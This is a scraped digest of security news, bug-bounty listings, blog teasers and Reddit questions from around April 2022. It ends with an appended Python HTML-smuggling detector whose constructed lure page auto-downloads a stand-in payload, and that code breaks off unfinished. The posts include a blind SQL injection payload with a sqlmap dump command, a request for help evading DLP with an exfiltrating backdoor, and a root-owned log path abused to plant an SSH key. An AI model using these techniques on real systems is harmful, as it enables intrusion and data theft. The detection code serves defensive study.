    Researchers last year discovered vulnerabilities in the ALAC format that could allow attackers to remotely access media and audio conversations on target devices.
    Serious bug in Android could allow users' media files to be accessed
    Security analysts found that this is due to flaws in the implementation of the Apple Lossless Audio Codec (ALAC).
    FreeBuf Weekly | Official report exposes US cyberattack weapon "Hive"; three Lenovo vulnerabilities affect millions of PCs
    Beneath the internet that once seemed calm, undercurrents are surging; while we enjoy the services the internet brings, countless backdoors and trojans have quietly embedded themselves in it.
    Instructors wanted | FreeBuf premium open courses need you to shine
    Do you have "a body of skills" with nowhere to use them? Or an "interesting soul" that few know about? Don't worry! FreeBuf's premium open courses have tapped "you" on the shoulder and handed over an invitation. Come take a look!
    Careful, LinkedIn job résumés are being targeted by "bad guys"
    Malware named "more_eggs" is hiding in résumés to steal accounts related to target companies.

    Aave V3's Price Oracle Manipulation Vulnerability
    Article URL: https://medium.com/@hacxyk/aave-v3s-price-oracle-manipulation-vulnerability-168e44e9e374 Comments URL: https://news.ycombinator.com/item?id=31117915 Points: 2 # Comments: 0

    If you have a WordPress site and have clients that require service from your company, please disable the admin login. This is just a lab machine, but as a blue teamer I see too much of this in the wild. I'm not releasing an email if your secure message site is not secure.
    submitted by /u/newworldsamurai3030

    Bypass of fix #1370749
    Shopify disclosed a bug submitted by encryptsaan123: https://hackerone.com/reports/1489077 - Bounty: $900


    After changing the storefront password, the preview link is still valid
    Shopify disclosed a bug submitted by tomorrow_future: https://hackerone.com/reports/1370749 - Bounty: $900
    Open redirect by the parameter redirectUri in the URL
    BlackRock disclosed a bug submitted by mrccrqr: https://hackerone.com/reports/1250758
    [h1-2102] [Plus] User with Store Management Permission can Make changeDomainEnforcementState - that should be limited to User Management Only
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1084892 - Bounty: $1900
    [h1-2102] [Plus] User with Store Management Permission can Make convertUsersFromSaml/convertUsersToSaml - that should be limited to User Management
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1084904 - Bounty: $1900
    [h1-2102] [PLUS] User with Store Management Permission can Make enforceSamlOrganizationDomains call - that should be limited to User Management Only
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1084939 - Bounty: $1900
    User with no Develop apps permission can Uninstall Custom App
    Shopify disclosed a bug submitted by ayyoub: https://hackerone.com/reports/1466855 - Bounty: $600
    [h1-2102] Improper Access Control at https://shopify.plus/[id]/users/api in operation UpdateOrganizationUserRole
    Shopify disclosed a bug submitted by ramsexy: https://hackerone.com/reports/1084638 - Bounty: $950
    Same the Url
    Shopify disclosed a bug submitted by 4bel: https://hackerone.com/reports/1459338 - Bounty: $500
    curl proceeds with unsafe connections when -K file can't be read
    curl disclosed a bug submitted by medianmedianstride: https://hackerone.com/reports/1542881
    Timing difference exposes existence of accounts
    Zivver disclosed a bug submitted by martinvw: https://hackerone.com/reports/1391636

    Smashing the Modern Web Tech Stack — Part 1: The Evolving Threat Landscape in 2022 and DOM-based…
    This is the first post in a series called ‘Smashing the Modern Web Tech Stack.’ Modern Web Applications today are more complex than ever… Continue reading on Medium »
    Testnet Bug Bounty Winners List & Swappi Early Adopters Raffle
    Dear Swappicados: the winner list has finally come! Continue reading on Medium »
    Open Redirect: Just a redirection?
    Greetings, everyone! I’m back with a new article after a long absence. In this writeup, I will attempt to explain everything I know about… Continue reading on Pentester Nepal »
    Vulnerability Research List
    Vulnerability Research OA/Middleware/Framework (Index). Open source products, foreign application software Continue reading on Medium »
    Open Redirection into Bentley System
    Hello, Hackers Welcome to another write-up where I have shared a scenario of Open Redirection… Continue reading on Medium »
    Weather App — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back to posting another writeup. It’s about Web again and yeah let’s start talking ;) Continue reading on Medium »
    Under Construction — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back to posting another writeup. So let’s start talking. So we can login to the page. I tried admin:admin and it didn’t… Continue reading on Medium »
    Toxic — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back. You may know me. My name is rootjkqsta. So today I was on HackTheBox pwning machines and challenges. So I saw this… Continue reading on Medium »
    LoveTok — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello we are back to another writeup. Now we are talking about LoveTok It’s about Web Exploitation by the way! So let’s start talking. Continue reading on Medium »
    Breaking Grad — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello ladies and gentlemen. I am back to posting a new writeup. Now we are talking about Breaking Grad Web Exploitation challenge. So… Continue reading on Medium »

    malware analysis project
    Hello guys, I'm trying to build a Linux user-space backdoor with data exfiltration capabilities, but I'm thinking about data loss prevention (DLP) software (endpoint protection). My question is, how to overcome this protection? And if someone has resources about a topic similar to mine, can you help? submitted by /u/Mind-Thief1122
    how to secure port 135
    I understand the importance of having the RPC service enabled for Windows to function properly, but it poses a lot of risk in the online world. What is the general best practice to keep this port secured? submitted by /u/Playful-Net9746
    How many IRemoteWinSpool RDP binds are "normal" when not printing?
    I've been noticing IRemoteWinspool RDP binds from some of our PCs. It got my attention because of PrintNightmare and the fact that none of us have been printing anything. I'm trying to find more information about this online, but I can't find anything about "normal" IRemoteWinspool amongst all the PrintNightmare stuff. Should the service be used without anybody printing? Thank you submitted by /u/techsupportwantedpls
    Any good tools for finding sequential keys in a batch of requests?
    Hello, I'm looking for a tool to search through the responses from a batch of HTTP requests and find values that might be sequential keys; bonus points if it can replay the requests and verify the value is in fact a sequential key. Thanks submitted by /u/quickmodel_ai
    Linux question for an application 'bug' I'm trying to tease out
    I've been playing with a proprietary Linux agent recently; it runs as root and it allows non-root users to arbitrarily set the location of its log files. I can change the location of the log files to anywhere on the file system. I can also, mostly, change the file name. The key issue being that the software appends the date to any filename I choose, though! For example, I discovered I can set the logfile name and location to /root/.ssh/authorized_keys_20220202. I can 'log' my own SSH key into the file contents too. If I could get the file named correctly it would work (which I tested), but I can't. The authorized key is ignored in that name format, which is completely understandable. Do you think this limitation in my ability to control the full file name means I'm done? I've been thinking about other services I know of like .rhosts, but I think the same issue would exist. Anyone got any good ideas? submitted by /u/shite_in_a_bucket
    Advice on getting more interviews for threat intelligence jobs?
    If this is too broad or just generally not allowed here I can delete this. I'm trying to pivot to cyber security and I'm applying for threat intelligence jobs because I already have a strong background in intelligence (DOD, IC, military). What can I do to increase my chances of getting interviews and offers? I have Network+, am scheduled to take Security+ this summer, and after that I'm looking to get another cert (possibly CEH). I also have a TS/SCI, and my intelligence background is technical analysis (signals intelligence, network analysis, etc.). Currently dual-hatting as a SME analyst and as a front end developer (HTML, CSS, JS, Angular). Also an advanced beginner / early intermediate Python coder, and I've done personal projects to visualize IP connections and Wi-Fi survey type stuff. I've played around with Kali Linux before and DNS dumpster, Whois, Shodan, etc., so I'm comfortable learning technical tools and data. Also planning to deep dive into threat intel feeds and maybe set up my own dashboards for fun and for learning. I have already had 2 screening calls, but I really want to break out of plain old DOD intel work and get into something technical and challenging. Any advice is greatly appreciated! P.S. Longer term I'd really like to get into threat hunting, but I have 0 experience with any of that, so I figured threat intel would be a good way to break into the industry for starters. submitted by /u/WLANtasticBeasts

    EnCase Acquisition to forensics mode
    Yes, I'm bringing this post back to the spotlight. I cannot get EnCase to go into forensics mode. I have admin privilege over the system, my keys are active, and I've tried it on 3 different versions. Are there any tips on how to get this working? submitted by /u/Metriczcaptian88
    Forensic Certifications
    Hi all, I want to get into digital forensics and was wondering what certifications I should get that will help me get a digital computer forensics job in the public/private sector (FBI, DHS, DOJ, etc.). Also, what would be the best way to prepare for them? Currently I have the Sec+ and A+ certs and some programming experience. submitted by /u/Fortune_Technical
    Simple Question about Disk Imaging
    Yes, I am a newbie; yes, I am just a clueless college student... I am not asking this question so you can tell me how stupid I am or for you to show how smart you are. Your boss is not going to see your response on a reddit post and give you a raise over it... So remember, please be nice. My question: How do forensic investigators create the disk image of a computer without having the password to the computer? I can use FTK Imager, Guymager, etc... But realistically, how will you use these programs when presented with a victim's computer whose password you don't know? Thank you lots! submitted by /u/uTeC3
    RAM/Memory Dump of iOS devices
    Hi community, for my recent project I'm wondering if it is possible to take a RAM/memory dump of an iOS device. I saw that for Android it is possible to take a system dump using adb. Is there any tool that works the same on iOS? Any suggestions would be great. Thanks submitted by /u/Aromatic_Ideal_2933

    Home-Grown Red Team: Testing Common AV Evasion With PE Packers On Windows 11
    Bypassing AV solutions is essential for initial access, lateral movement and full domain compromise. Over the last couple of years, we’ve… Continue reading on Medium »
    How To Get The Most Out Of Pen Tests
    I recently wrote an article for the CyCognito blog on getting the most out of pen tests. Pen tests are needed and, when properly done… Continue reading on Medium »
    RED TEAM | KLSFP Certification
    What is Red Teaming? Continue reading on Medium »
    How do I take over Cobalt Strike Team Servers
    Hi folks, today I would like to share how I take over some Cobalt Strike TeamServers with Quake and Password Spray Attack. From the… Continue reading on Medium »

    Threat Assessment: BlackByte Ransomware
    BlackByte is ransomware as a service that emerged in July 2021. Read our overview and recommended courses of action for mitigation. The post Threat Assessment: BlackByte Ransomware appeared first on Unit42.

    Maltego’s Attempts at Cryptocurrency Investigations
    Maltego is haunted by the laurels of grandiose cryptocurrency investigations… Continue reading on Medium »
    War in Ukraine / April 20
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Another cyberdetective trap
    I came across an interesting GPS tracker https://osmodroid.ru, https://osmo.mobi/app project that allows you to get a digital fingerprint… Continue reading on Medium »
    Recon tools for webapp penetration testing Part-1 (WebProxies & DNS Discovery) tools
    Here are some webapp penetration tools Continue reading on Medium »

    Keeping Up With PHP Updates
    Staying on top of critical security risks and vulnerabilities is imperative for the safety of your website. Some of the types of threats impacting our client sites include injections, broken authentication, cross site scripting, or even attackers targeting components with known vulnerabilities. In this post, we’ll be going over why outdated PHP versions can lead to an increase in vulnerabilities with your website and how you can minimize these risks to protect your site and your visitors. Continue reading Keeping Up With PHP Updates at Sucuri Blog.

    SecWiki News 2022-04-21 Review
    Using neural networks to mine common features to discover unknown APTs by ourren; BinAbsInspector: automated static vulnerability detection tool for binaries by ourren; A glimpse at the lowest-latency network in the world by Avenger; Attack and detection of WMI backdoor techniques by ourren. For more of the latest articles, visit SecWiki

    JBoss EAP/AS <= 6.* RCE - A little bit beyond \xAC\xED
    submitted by /u/j_jjjj
    Hello all, I have released a new version of SCodeScanner v2.1.0 which contains advanced rules and some additional features. Features include removing false positives and sending the output file directly to Jira and Slack; more info - https://github.com/agrawalsmart7/scodescanner & https://scodescanner.info.
    submitted by /u/agrawal7
    CVE-2022-21449 PoC demonstrating TLS MITM
    submitted by /u/kmhn

    Official release of a major report fully exposing the US cyberattack weapon "Hive"
    Beneath the internet that once seemed calm, undercurrents are surging; while we enjoy the services the internet brings, countless backdoors and trojans have quietly embedded themselves in it.
    Knowledge Continent recruitment | The future is here, and you happen to be here
    This round will recruit 3 "lords"! Come join in co-building and sharing Knowledge Continent!
    FreeBuf Morning Report | Russian APT group continues to target Ukraine; BlackCat ransomware breaches 60 entities worldwide
    The BlackCat ransomware gang breached the networks of at least 60 organizations worldwide between November 2021 and March 2022.
    REvil's TOR site restarts; a wave of new ransomware may be on the way
    Recently, research indicates that REvil ransomware's servers on the TOR network have resumed normal operation after months of silence.
    FBI warns of ransomware attacks targeting the US agriculture sector
    The US Federal Bureau of Investigation (FBI) warned that ransomware gangs are "more likely" to launch cyberattacks against the food and agriculture (FA) sector during harvest and planting seasons.
    NATO's 2022 "Locked Shields" cyber exercise held in Estonia, with 2,000 security experts training together
    The NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) organized the 2022 "Locked Shields" cyber exercise from April 19 to 22.
    "Anheng (安恒) Cybersecurity March Monthly Report" | One report covering March's summary of the underground economy, vulnerabilities, APTs, ransomware, hidden links and more
    One report covering March's summary information on the underground economy, vulnerabilities, APTs, ransomware, hidden links and more.

    Exploiting Security Checks on Bind Mount
    submitted by /u/tbhaxor

    Solving the pagecontext problem of the Godzilla memory shell
    Author: Y4er Original link: https://y4er.com/post/solve-the-problem-of-godzilla-memory-shell-pagecontext/ Preface: When injecting a memory shell with the current webshell tools, Behinder (冰蝎) solves it by creating a HashMap, putting request, response and session into it, and replacing pagecontext HttpSession session = ...

    What do you need to know to develop expert-level exploits?
    Developing professional-level 0day and silent exploits, breaking them, for example jpeg, word macro, etc. What needs to be learned to write advanced exploits? I'm learning C and C++, I work 8 hours a day, and in the remaining 2 hours I work on Python. What do you think I need to learn to write and understand exploits at a full professional level? submitted by /u/Sargatanas_

    Know The Difference Between XSS vs CSRF
    Cross-site Scripting (XSS) and Cross-site Request Forgery (CSRF) are very common client-side attacks against web applications. While XSS… Continue reading on Medium »

    [Security Advisory] Atlassian Bitbucket Data Center remote code exec...
    Recently, Atlassian released a security advisory fixing a code execution vulnerability in Atlassian Bitbucket Data Center. The vulnerability...

    Best Practice Regarding iMessage Sync In UFED iOS Extraction Scenarios
    What exactly happens to iMessage data (attachments and message content) when the Message Sync button found at Settings>name>iCloud>Messages is enabled? Does the data leave the device and join the cloud, where it is then synced across other iOS devices that belong to the user, or does this data remain locally with a copy of this data existing in the cloud? Perhaps a mixture of the two occurs? Within the context of a forensic iOS data extraction via UFED, I have some colleagues who believe it’s best practice to disable message sync prior to the extraction attempt so that the messages are downloaded back to the device and are included in the subsequent extraction dataset. In contrast, I have other colleagues who claim iMessage data never truly leaves the sms.db, so even if message sync is enabled, extraction via UFED should result in all iMessage data being captured anyway. This article from Elcomsoft seems to somewhat support the latter theory, albeit vaguely. I haven’t been able to find any other research into this. What are your thoughts? What is best practice for forensic iOS data extraction when Message Sync is enabled? Do you disable Message Sync and wait for whatever is happening to finish, or do you just perform the data extraction with no regard for the Message Sync setting? submitted by /u/ucfmsdf
    FTK imager recover deleted files
    Hi guys, I'm new to FTK Imager. I have created a separate D drive on my Windows machine and deleted some files from it. In FTK Imager I created a new disk image, logical drive, raw format. I see the deleted files and click on export file. After opening the exported file I get an error saying "The file cant be opened That might be because the file type is unsupported, the file extension is incorrect, or the file is corrupt." Any idea what I'm doing wrong? submitted by /u/Fortune_Technical
    No boot after conversion of .E01
    Hello everyone! I'm trying to convert an .E01 to a VMware machine, but every time I try to start the virtual machine there is no bootable device. I tried to mount the forensic image with FTK Imager as a physical disk (writable, without logical unit) and open it with VMware. Also, I tried with Oracle VM VirtualBox and Mount Image Pro v7 without results. I also tried the conversion using vboxmanage.exe, using the result file with VMware Player https://preview.redd.it/9a6ob5cmspu81.jpg?width=722&format=pjpg&auto=webp&s=3cac78e0145092fc785c3a00e4356c83418aaa06 Can someone help me, please? I need to run the OS inside my .E01 file to run a specific software submitted by /u/Zipper_Ita

    What VPS to choose?
    There are tons of cloud providers that offer different types of servers with a lot of different options. I will talk about the ones I… Continue reading on Medium »
    Exploiting a File Upload Vulnerability — A Directory Traversal Attack
    Hello people, happy to have you here once again. I do hope you enjoy this write-up as much as I enjoyed ‘writing’ it. I would have to… Continue reading on Medium »
    Container Escape Vulnerability in AWS Hot Patch
    Update or mitigate now if you are affected (if you run containers, you probably are.) Continue reading on Cloud Security »
    Hacked REDBUS WordPress plugin and able to perform Cross-site Scripting Vulnerability….
    Hello, Hackers Welcome back to another writeup where I have shared a scenario of WP_plugin being vulnerable to Cross-site Scripting… Continue reading on Medium »
    youtube.com or уoutube.com??
    As you can see, both of them look identical, but the thing is the second уoutube.com won't work. Your first reaction: “How the hell it's… Continue reading on Medium »
    CVE-2022–29072 Windows Privilege Escalation
    7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the… Continue reading on Medium »

    Survey website that only allows one submission a month
    My company has a survey that only allows one submission a month. All other submissions are not counted or reviewed. I'm assuming that the website tracks IPs. I want to ensure that I cannot be traced back to my survey, and I want to be able to submit multiple surveys a month. Would a VPN protect my identity? Is there another way that the company could be tracking me or submissions? submitted by /u/thukirby
    Question about Blind SQL injection?
    Hi, I was wondering if someone could shed some light. Currently I was scanning my site testing out wapiti and I was shocked to find 11 blind SQL injections, which I'm thinking is a false alert. What's odd is that no part of the website I tried accessing shows any errors. /_next/image?url=%2F_next%2Fstatic%2Fimage%2Fpublic%2Fimg%2Fbanners%2Fbanner-XXX-XXXX-XXX-XXX.2d09a971dce1f42dXXXXXXXXX.jpg%2Csleep%287%29%231&w=1200&q=75 HTTP/1.1 I tried it on sqlmap but not sure if that was the correct mapping? sqlmap -u "https://mydomain/_next/image?url=75*" --dbs --level=5 --risk=3 --dump --batch --tamper=space2comment --threads 10 Thank you submitted by /u/killmasta93

    $10k Host header vulnerability in Google App Engine
    Article URL: https://sites.google.com/site/testsitehacking/10k-host-header Comments URL: https://news.ycombinator.com/item?id=31102998 Points: 2 # Comments: 0
    Java 15 introduced a cryptographic vulnerability
    Article URL: https://www.itnews.com.au/news/java-15-introduced-a-cryptographic-vulnerability-578958 Comments URL: https://news.ycombinator.com/item?id=31096184 Points: 79 # Comments: 31

    Open Akamai ARL XSS at
    U.S. Dept Of Defense disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/1317024
    Full account takeover in due lack of rate limiting in forgot password
    U.S. Dept Of Defense disclosed a bug submitted by takester: https://hackerone.com/reports/1059758
    vulnerable to CVE-2022-22954
    U.S. Dept Of Defense disclosed a bug submitted by null_bytes: https://hackerone.com/reports/1537694
    CORS Misconfiguration
    U.S. Dept Of Defense disclosed a bug submitted by shirshak: https://hackerone.com/reports/1530581
    Reflected XSS in the shared note view on https://evernote.com
    Evernote disclosed a bug submitted by sarka: https://hackerone.com/reports/1518343 - Bounty: $500

    looking for an exploiter who can create gametools for an online game
    submitted by /u/dr4iner
    Career Change Options: Binary Exploitation or Pentesting/Red Teaming
    Hi All, I currently do Incident Response and Threat Hunting for an organization and have lost the passion. A few months ago, I found binary exploitation and liked it. However, I'm stuck on a roadmap. I thought of moving laterally to the RED team side, thinking it would be a good foundation. However, with pentesting there would be a lot to learn since your skills need to be broad. I wouldn't have the chance to create exploits either. I want to develop exploits and find new vulnerabilities. I have been doing RE and Malware analysis for some time now as a side hobby and some Binary Exploitation courses. As a security professional, my interests and goals right now are to break tech (new and old) and find unique and creative ways of entering. Wondering what a good path/road map to take to get into vulnerability research? The way I see it there are two options: Get into pentesting (AD and Web) to learn the building blocks and do VR on the side. Find the area you want to specialize in and focus on the vulns there. Gain experience and do red teaming. Find a codebase and platform within a Bug Bounty platform, research the hell out of it, and start poking around. Maybe move into AppSec. Very new to this side of the house, so please feel free to correct me or add your opinions. Thanks! submitted by /u/SushiSush1

    Threat Hunting for Phishing Pages
    submitted by /u/mstfknn
    CVE-2022-21449 detector - Finds possibly vulnerable JAR/WAR files
    submitted by /u/SRMish3
    A Detailed Analysis of The SunCrypt Ransomware
    submitted by /u/CyberMasterV
    SSRF Attack Examples and Mitigations
    submitted by /u/benarent
    CVE-2022-21449: Psychic Signatures in Java
    submitted by /u/Gallus

    JDK CVE-2022-21449
    Article URL: https://access.redhat.com/security/cve/cve-2022-21449 Comments URL: https://news.ycombinator.com/item?id=31101123 Points: 2 # Comments: 0
    Jira Server and Jira Data Center CVE-2022-0540 – Authentication Bypass in Seraph
    Article URL: https://community.atlassian.com/t5/Jira-articles/Jira-Server-and-Jira-Data-Center-CVE-2022-0540-Authentication/ba-p/2006104 Comments URL: https://news.ycombinator.com/item?id=31100115 Points: 4 # Comments: 0
    CVE-2022-29153: To Consul or Not to Consul
    Article URL: https://ronin.ae/news/2022/04/15/CVE-2022-29153-to-consul-or-not-to-consul.html Comments URL: https://news.ycombinator.com/item?id=31093969 Points: 1 # Comments: 1

    OSINT in VKontakte
    Today I will analyze the main sources of data that I use when conducting OSINT investigations on the Russian social network VKontakte. Continue reading on Medium »
    War in Ukraine / April 19
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »

    SecWiki News 2022-04-20 Review
    A brief discussion of offense-defense exercises by ourren. For more of the latest articles, visit SecWiki

    FreeBuf Morning Report | MIIT names 37 apps that infringe user rights; a real-time speech algorithm can block microphone eavesdropping
    Researchers at Columbia University explained that the algorithm works predictively, inferring what the user will say next and generating blocking background noise in real time to cover the speech.
    Beware! Catalan politicians and activists targeted by spyware
    An inconspicuous zero-click vulnerability may have been exploited long ago to install spyware from the Israeli cyber companies NSO and Candiru.
    New BotenaGo malware variant targeting DVR devices
    Recently, threat analysts discovered a new variant of the BotenaGo botnet malware.
    CISA warns that attackers are exploiting a Windows vulnerability
    CISA's actively exploited vulnerabilities list has added a local privilege escalation vulnerability in the Windows Print Spooler.
    ESET warns that three Lenovo vulnerabilities affect millions of PCs
    ESET researchers reported the three serious security vulnerabilities to Lenovo in October 2021; all of them have now been fixed.
    Surging numbers: LinkedIn has become phishers' favorite
    LinkedIn phishing activity heated up sharply in the first quarter of this year; it now accounts for 52% of phishing worldwide, topping the rankings.
    FreeBuf Morning Report | CIA's main cyber weapon "Hive" exposed; Lenovo firmware vulnerabilities affect millions of PCs
    Recently, the National Computer Virus Emergency Response Center discovered that the "Hive" malicious code attack-and-control weapon platform is a main cyber weapon dedicated to the US Central Intelligence Agency (CIA).

    Burp Suite Extensions for Web Hunting
    Introduction Continue reading on InfoSec Write-ups »
    $1000: How I could have Hack any account and become a billionaire overnightTop Crypto-Trading….
    Create Bind and Reverse Shells using Netcat

    Alright guys, can someone help me find this attack I'm doing??
    So I received the following from my ISP. I received 4 other ones last week, and I believe that I have identified the machine. It's a desktop PC running Linux Mint. I'm okay with Linux; I've run a couple of headless servers before and used Ubuntu as a daily driver for a couple of years, but outside of tasks I needed to complete my knowledge is not high. I can't find anything in any logs that indicates this activity, but I'll be honest, I don't even know how deep I'm looking. I also have no idea where I could have picked up a script like this either. I'm likely gonna just nuke the machine and get a new IP address from my ISP, but I'd like to try and isolate this first. My IP has been redacted, but everything is there otherwise. The previous failed attacks were all trying to breach German IPs; I can post those too if they would help. A device using your connection attempted to access another network without authorization. Apr 18 16:02:58 li352-240 sshd[2818468]: pam_unix(sshd:auth): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=XXXXXX user=root Apr 18 16:03:00 li352-240 sshd[2818468]: Failed password for root from XXXXX port 51808 ssh2 Apr 18 16:03:01 li352-240 sshd[2818468]: Received disconnect from XXXXX port 51808:11: Bye Bye [preauth] Apr 18 16:03:01 li352-240 sshd[2818468]: Disconnected from authenticating user root XXXXX port 51808 [preauth] Apr 18 16:03:02 li352-240 sshd[2818491]: pam_unix(sshd:auth): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=XXXXX user=root.......... submitted by /u/Beginning-Pace-1426
    CHFI EXAM
    I am taking my EC-Council CHFI cert in a week. As I have seen, people are not fans of this cert or EC-Council (it was free, otherwise I would have chosen a different one). That all being said, I am taking the version 9 exam and the study material is outdated, along with the labs and book they provide. So, people who have taken it, what is the best way to study? I have sound exam questions and a few people said most of those questions are on the exam. Thank you, just trying to be ready for it submitted by /u/Critical-Balance7980
    How to convert a pcap file to an image file?
    I want to convert my pcap file to a png format file. submitted by /u/One-Ad2289 [link] [comments]
    What should I study for this job application?
    Hi everyone, I'm applying for a digital forensics job in LE and the first stage is a test. I have read the FAQs in this subreddit but found nothing about what to expect in job application tests (not interviews). The application states that applicants should prepare for the test by studying the following (roughly translated to English):
    - Law measures for digital evidence collection and chain of custody
    - Digital forensics
    - Operating systems
    - File systems
    - Windows registry
    - OSINT (Open Source Intelligence)
    I have some knowledge of all these subjects but I'm by no means an expert. What should I focus on while studying so that I can cover most bases? submitted by /u/InfoSecSensei [link] [comments]
    It’s not always clear which US Gov jobs are digital Forensics, so I’ve created a scraper!
    submitted by /u/Strijdhagen [link] [comments]
    I’ve noticed something interesting about the UITextInputContextIdentifiers.plist file (pulled from an encrypted iOS backup) - in some cases, it identifies a Signal contact by phone number, whereas others are only listed by a UID … anyone else aware of the following?
    Can someone please explain to me UITextInputContextIdentifiers.plist - It seems to identify some contacts by phone number but others by UID code? I'm trying to get my head around the UITextInputContextIdentifiers.plist file and the way in which it identifies the contacts. As you're probably all aware, it's a common file (certainly on iOS) to WhatsApp, Signal, iMessenger etc etc, which lists the users that a communications app interacts with. I've noticed however that there are some differences between different apps and files and times and dates that I view these files on one of my "daily drivers" that gets regular use.. Some UIDs are random like this: ID_CK_40a10d98edf9f302ad15daac98bf2da665ab8 Some UIDs are directly identifiable by the contact phone number (obviously I'm just usin…
  • Open

    AWS's Log4Shell HotPatch Vulnerable to Container Escape and Privilege Escalation
    submitted by /u/YuvalAvra [link] [comments]
    US Govt Cloud Security Needs ("SCuBA"): including Technical Reference Architecture and Extensible Visibility Reference Framework (eVRF) Guidebook links
    submitted by /u/ScottContini [link] [comments]
    Shielder - Printing Fake Fiscal Receipts - An Italian Job p.1
    submitted by /u/smaury [link] [comments]
    Teaching Burp a new HTTP Transport Encoding
    submitted by /u/0xdea [link] [comments]
    Exploiting, detecting, and correcting IAM security misconfigurations
    submitted by /u/MiguelHzBz [link] [comments]
    CVE-2022-26809 : Remote Procedure Call Runtime Vulnerability
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    AWS Log4Shell HotPatch Introduced a Container Escape Vulnerability
    Article URL: https://unit42.paloaltonetworks.com/aws-log4shell-hot-patch-vulnerabilities/ Comments URL: https://news.ycombinator.com/item?id=31090332 Points: 8 # Comments: 1
  • Open

    AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
    We identified severe security issues within AWS Log4Shell hot patch solutions. We provide a root cause analysis and overview of fixes and mitigations. The post AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation appeared first on Unit42.
  • Open

    Black Box Test on eCPTXv2 exam
    Hi folks, just as I promised, I am sharing my review on eLearnSecurity’s eCPTX exam from an exam taker without purchasing course material… Continue reading on Medium »
  • Open

    Poodle and Doodle, FUD and the Sucuri WAF
    On any given day, Sucuri sees thousands of clients go through the PCI compliance process. The requirements outlined by the Payment Card Industry Data Security Standard (PCI DSS) are mandatory for any website accepting credit card payments, and this process can be very stressful for website owners not familiar with these guidelines. Failure to comply with PCI requirements could result in penalties, large fines, or even losing the ability to take online credit card payments.  Continue reading Poodle and Doodle, FUD and the Sucuri WAF at Sucuri Blog.
  • Open

    April 2022 Git Vulnerability (CVE-2022-24765) Explained
    Article URL: https://www.youtube.com/watch?v=3Kct--wJARc Comments URL: https://news.ycombinator.com/item?id=31087896 Points: 1 # Comments: 0
  • Open

    GRC Tool that Primarily Focuses on Managing Security Controls
    Hi all. I'd like to ask for a bit of recommendation on which GRC tool to use for an organization. The focus is all about managing security controls (e.g. can the control relate to other policies, other controls, be tagged); Ideally, I'd like to import existing security controls without much manual input if possible and the GRC tool would be a superior option over managing security controls in Excel; The GRC tool makes the management of control data easier rather than the status quo. I've currently dived into eramba GRC so far, but I'm afraid for the sophistication of all of the features, the onboarding and learning curve is a bit high. In addition, it does not seem to check off all of the user-friendly requirements in order to have security controls implemented, managed, and audited. My question is, are there any other GRC tools (focused on the management of security controls) that you'd recommend in order to fulfill these points? An on-prem solution would be nice, and cost isn't a huge issue. submitted by /u/SimplyMoxie [link] [comments]
    Entry Level Net Sec Career Advice
    Hello, I'm about to graduate with a computer science degree in a few weeks. I've been doing a lot of self teaching using THM and HTB, but I have no formal technical experience other than my degree and a web development internship. My end goal is to become a penetration tester/red teamer, but I have quite a bit to learn before I get there. I'm planning on applying to junior cyber positions in my area, but I've heard it's extremely difficult getting into an entry level position out of college. I was hoping for some insight about what kind of path should I take. Should I go for IT roles before applying to entry level cyber? Should I get Security+ or some other certification before applying? There's a lot of information out there and a lot of options, I just want to make sure that I'm making a smart decision. Thanks! submitted by /u/Lethal_Injections [link] [comments]
    Trying to start a career in Cyber Security.
    I was looking into switching to Cyber Security and NYU Cyber Security Bootcamp keeps popping up. It says its from NYU Professional Studies and they dont accept educational loans which is kind of odd. Has anyone tried there program? And it is legitimate? Seems a lil sus that a university wont take educational loans. submitted by /u/amatsuastray [link] [comments]
  • Open

    A Detailed Guide on HTML Smuggling
    Introduction HTML Smuggling is an evasive payload delivery method that helps an attacker smuggle payload past content filters and firewalls by hiding malicious payloads inside The post A Detailed Guide on HTML Smuggling appeared first on Hacking Articles.
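    The teaser above names the technique but not its mechanics. As an added example (my own, not code from the Hacking Articles post), here is a Python scanner for the client-side pattern HTML smuggling relies on: a base64 blob embedded in the page, decoded with atob(), wrapped in a Blob, turned into an object URL and auto-downloaded by a programmatic click, so the binary never crosses the wire as a recognizable file. Both the malicious and the benign page are constructed; the "payload" is a stand-in that merely begins with the MZ bytes of a PE header.

```python
import base64
import re

# Constructed stand-in for a smuggled executable: starts with the PE magic "MZ".
PAYLOAD_B64 = base64.b64encode(b"MZ" + b"\x90" * 300).decode()

# Constructed lure page: decode -> Blob -> object URL -> forced download.
MALICIOUS_HTML = f"""<html><body><p>Your document is loading...</p>
<script>
var b64 = "{PAYLOAD_B64}";
var bin = atob(b64);
var bytes = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
var blob = new Blob([bytes], {{type: 'application/octet-stream'}});
var a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = 'invoice.iso';
document.body.appendChild(a);
a.click();
</script></body></html>"""

# Constructed benign page: Blob downloads are legitimate (CSV export on a user click).
BENIGN_HTML = """<html><body><script>
document.getElementById('export').addEventListener('click', function () {
  var blob = new Blob([csv], {type: 'text/csv'});
  location.href = URL.createObjectURL(blob);
});
</script></body></html>"""

# Each indicator is one step of the smuggling chain; a verdict needs several of them.
INDICATORS = {
    "decode": re.compile(r"\batob\s*\(|\bdata:[\w/+.-]+;base64,"),
    "blob": re.compile(r"new\s+Blob\s*\(|\bUint8Array\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\(|msSaveOrOpenBlob\s*\("),
    "download": re.compile(r"\.download\s*=|download\s*=\s*['\"]"),
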